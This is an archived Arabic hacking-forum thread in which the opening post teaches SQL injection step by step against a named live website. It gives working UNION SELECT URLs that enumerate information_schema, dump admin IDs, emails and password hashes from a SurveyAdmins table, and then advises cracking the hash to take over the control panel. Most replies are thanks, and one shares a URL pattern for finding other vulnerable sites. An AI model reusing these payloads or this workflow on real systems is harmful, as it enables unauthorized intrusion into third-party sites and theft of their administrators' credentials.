:: vBspiders Professional Network ::
صفحة 1 من 4 1 23 الأخيرة »
عرض 40 مشاركات من هذا الموضوع لكل صفحة

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)
-   -   ترتيب الخطوات في حقن قواعد البيانات SQL Injection (http://www.vbspiders.com/vb/t20088.html)

KaLa$nikoV 09-15-2009 03:30 PM
ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
عنا موقع مصاب

http://www.datavore.com/home?op=cat&cid=2


نستخدم الامر
order by
لمعرفه عدد الاعمده المصابه

نبلش من 1
ونزود لحتى يختفي معانا الخطأ

كود PHP:
order by 1--
 
order by 5--
 
order by 10--
 
order by 15-- 
لاحظ اشاره الناقص في اخر الرابط -- يمكن استبدالها في بعض المواقع بالاشاره */
اي هكذا
كود PHP:
order by 1/* 
يا نورع العين نرجع لمكانا


order by 15--

لاحط هنا ظهر الخطأ
النتيجه تجاوزنا عدد الاعمده المحدد
الحل نبدأ بتقليل عدد الاعمده الى ان يعود الوضع الي ما كان عليه
order by 14
لاحظ الان الموقع تمام
ما فيه ايا خطأ
اذا عدد الاعمده تمام
نضيف الامر التالي
مع الاعمده

union select
ونضيف قبل الرقم علامه الناقص

يصير الرابط هيك

كود PHP:
 
http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14-- 
انتبه للناقص

الان لنعرف اصدار القاعده
نكتب
كود PHP:
 
version() 
وهذه بعض الاوامر


database()
version()
user()

not end



الموضعوع لم ينتهي بعد


الان نضيف التالي للحقنه



كود PHP:
concat(table_name,0x3a,column_name,0x3a,table_schema
و

كود PHP:
 
+from+information_schema.columns-- 
فتصبح

كود PHP:
 
http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns-- 
الان نضيف الامر التالي
كود PHP:
where+column_name+LIKE+CHAR(371129711537
كود PHP:
 
http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)-- 
طيب يا حص طلع لي نتائج كثيره هذا الموقع بدو شغلة كيف

طيب الخبره رح تعلمك شو تختار


الان عنا مفترق مثلث ماشاء الله

شوف اخي
اطلع ع النتائج زي الصاروخ
بتلقى الجداول المهمه هي
الادمن
اليوزر
والممبر
بس احنا بدنا نخترق الادمن
وهو المتوقع هدفنا يلا نصيده

SurveyAdmins:admin_password:SURVEYS
SurveyAdmins:admin_md5_password:SURVEYS

زي ما انتو شايفين عنا خيارين
بتهيالي الاول هو الي مطلوب

خلينا نشتغل عليه



بلزمنا الان الموقع الرائع وهو

كود PHP:
 
http://www.waraxe.us/sql-char-encoder.html 
اوك يا غالي شو بدنا بهذا الموقع
تشفير اسم الجدول وعنا اسم الجدول هو
SurveyAdmins
نوع التشفير هو
كود PHP:
 
  MySql hex-encoded string 
يصير الان بحث من اسم هدا الجدول وذلك من خلال الامر

where+table_name=



يعني هيك

كود PHP:
where+table_name=0x53757276657941646d696e73 
الاستغلال


كود PHP:
http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns+where+table_name=0x53757276657941646d696e73-- 
ما شاء الله طلع لنا خيارات كثيره

بهمني انا منها


الان خلينا نجمع الاستغلال


اسم الجدول
SurveyAdmins

السجما
SURVEYS

اسم العمود هو باقي الاسماء بالوسط
ورح نجمعها كلها مع بعض بالامر

concat

وبتصير هيك

concat(name,0x3a,pass)


كود PHP:
;admin_id;admin_fname;admin_lname;admin_md5_password;admin_password ;admin_email;admin_perm
[php]

نجمعهم بالامر

بصيرو

كود PHP:

concat(admin_id,0x3a,admin_fname,0x3a,admin_lname,0x3a,admin_md5_password,0x3a,admin_password ,0x3a,admin_email,ox3a,admin_perm
نركبه بالحقنه


كود PHP:
http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(admin_id,0x3a,admin_fname,0x3a,admin_lname,0x3a,admin_md5_password,0x3a,admin_password ,0x3a,admin_email,0x3a,admin_perm),7,8,9,10,11,12,13,14+from+SURVEYS.SurveyAdmins-- 
بقى تشوف الباس مشفر فكه من موقع هاش كلر وشوف مسار لوحه التحكم واخترق







اقتباس:
والله يا حبايبي اجيت اعمل لكم الدرس صوت وصوره بعد من خلصت من هالكتابه الطويله
لقيت الموقع ضرب ومش راضي يفتح
رح اشرح نفس الخطوات على موقع ثاني
بعين الله
استفين ع التاخر هي الدرس بالفيديو .....

من اكتشاف الثغره SQL الى لوحه التحكم بالصوت والصوره

فايروس عرعر 09-20-2009 04:48 AM
ششرحك جونااااان/يعطيك الف عافيه

KaLa$nikoV 09-22-2009 10:25 PM
تسلم يا غالي
بس الشرح هو ع السريع ما بغني عن دوره
والدوره عما قريب
بس اول ما افضى

M!M0 10-19-2009 08:06 PM
مشكوووووووووور أخي VoLc4n0 على الشرح

THE WARRIOR 10-27-2009 03:57 AM
شكرااااا ليك جارى التجريب

Black-FoG 11-03-2009 01:44 AM
وش اقول غير انك مبدع والكبير كبير ..

تسلم على الدرس الحلو وربنا يخليك لينا ونشوف المزيد من ابداعاتك








Adiooos

الشبح المرح 11-05-2009 07:46 PM
تسلم ياحبيبي يابركان

و لاكن هدا بالنسبة للاصدار 5

و الاصدار 4 نستعمل طرق اخرى

للتوضيح فقط يابركان ههههه

El3ctr0-Dz 11-20-2009 11:00 PM
مشكووووور بارك اله فيك

the cold zero 11-22-2009 12:58 AM
شكرا على الشرح الممتاز

Black-FoG 12-12-2009 11:51 PM
Up

V
V
V

للأهمية



Adioooos

M!M0 12-31-2009 02:30 PM
شكرا لك فولكانو للشرح والدورة

فتى المدينه 12-31-2009 04:11 PM
يعطيك الف عافيه على الشرح خيوووو

شرح واضح وفية وكفيت

مجاهد 01-01-2010 12:06 PM
السلام عليكم ورحمة الله وبركاته

انا تلميذ جديد لديكم

والله لقد اعجبني هذا المنتدى بما فيه من مواضيع صادقة ومن مبدعين محترمين فانا ارحب بكم وانا افتخر بان اكون تلميذ لديكم
وانا اشكر الاخ VoLc4n0 لانه شجعني بان اشارك معكم وهذا يعود في طريقة شرحه لدروس
اقبلوني وانا ممتنا لكم
تقبلوا تحياتي
مجــــــــــــــــــــــــــــــــا هد

Dr.NaNo 02-11-2010 07:21 PM
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .
موفق بإذن الله ... لك مني أجمل تحية .

ღ}~ ملكة الهاكر ريماس ~{ღ 02-17-2010 01:04 AM
يسلمووووووووووووووا ايديك اخي الغااااااالى والعزيز

اشكرررررررررررررررررررك

sub zero 02-24-2010 03:27 PM
i learn from your cours and now i'm hacker because of you volcano you are the best and my age is 17 thanx and thanx for this forum is the best every second i get something new and it's very good your cours thanx thanx thanx volcano

samourai_7 04-13-2010 11:05 PM
بارك الله فيك

SnaKe-Dz 04-14-2010 07:57 PM
بارك الله فيك ..

parazit 04-25-2010 03:05 PM
مشكور اخي
بارك الله فيك

blablabou94 04-29-2010 12:22 AM
اقتباس:
المشاركة الأصلية كتبت بواسطة Black-FoG (المشاركة 76173)
وش اقول غير انك مبدع والكبير كبير ..

تسلم على الدرس الحلو وربنا يخليك لينا ونشوف المزيد من ابداعاتك








Adiooos
الكبير هو الله ... أرجوك ماتعاويدها هاي الكلمة أرجوك .. قل شكرا ........ شكرا فولكان على الشرح رائع والله

SnIpEr-Ma 05-19-2010 08:50 PM
[align=center]مشكووووور بارك الله فيك[/align]

عبد الله ر 07-27-2010 09:42 PM
الله يعطيك الف عافية اخي فولكانو
والله بعد المشاهدة الشرح رائع جدا
مشكور

ألبتار 08-22-2010 12:57 AM
[align=center]مشكور والله يعطيك الف عافيه عل الشر الشرح[/align]

DR.THMoORY 08-27-2010 10:41 AM
مشكوور حبيبي

the silencer 08-30-2010 07:44 AM
machkourrrrr

bt4 09-04-2010 03:49 PM
بارك الله فيك وشكرا على المجهود

k4$p3r-MA 02-06-2011 04:21 PM
تسلم يا غالي

Dz_HACker 02-07-2011 06:34 PM
شكرا لك

ouakkaha 02-17-2011 12:50 AM
مشكووووووو ولله مشكور بالشروحات الرائعة

المخترق الصغير 04-02-2011 03:46 PM
مشكور اخي عبده عالشرح الاكثر من رائع

Hicham-Hex 04-30-2011 04:40 PM
merciiiiiiiiiiiiiiiiiiiiiiiiiii


نقدر يا اخيييييييييي جهووودك المتواصلة سعيا ان يكووون هدا المنتدي دايمآآا في القمة



مشكووور :د

اجتياح الجراد 04-30-2011 09:30 PM
السلام عليكم

عاداك العيب اخي

سلمت يداك تحيات اخوك اجتياح الجراد

Barhom Basri 05-21-2011 10:06 PM
ألله يعطيك الف عافية على الشرح التماام
و جعلها الله في ميزان حسناتك

hk-wahman 06-06-2011 06:57 PM
مشكووووورر اخي الله يعطيك العافية

LorD.511 06-27-2011 02:26 PM
شكراً لك أخي على هذا المجهود وننتظر جديد أبداعك

Dark LeGEnD 08-13-2011 02:52 PM
فيري جووووود يا كبير

T-VAIROS Dz 08-13-2011 09:33 PM
هذ دروك لجلب موقع مصابة بي SQL
il_product.php?id=

CODE3 08-21-2011 10:50 PM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
يسلموااااااااااااااااااا

الحاقد 08-27-2011 07:28 PM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
شكرا على الشرح الممتاز

maspix60 09-04-2011 01:46 AM
رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection
 
جميل جدا يا غالى تشسم ايدك


الساعة الآن 12:08 PM
صفحة 1 من 4 1 23 الأخيرة »
عرض 40 مشاركات من هذا الموضوع لكل صفحة


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0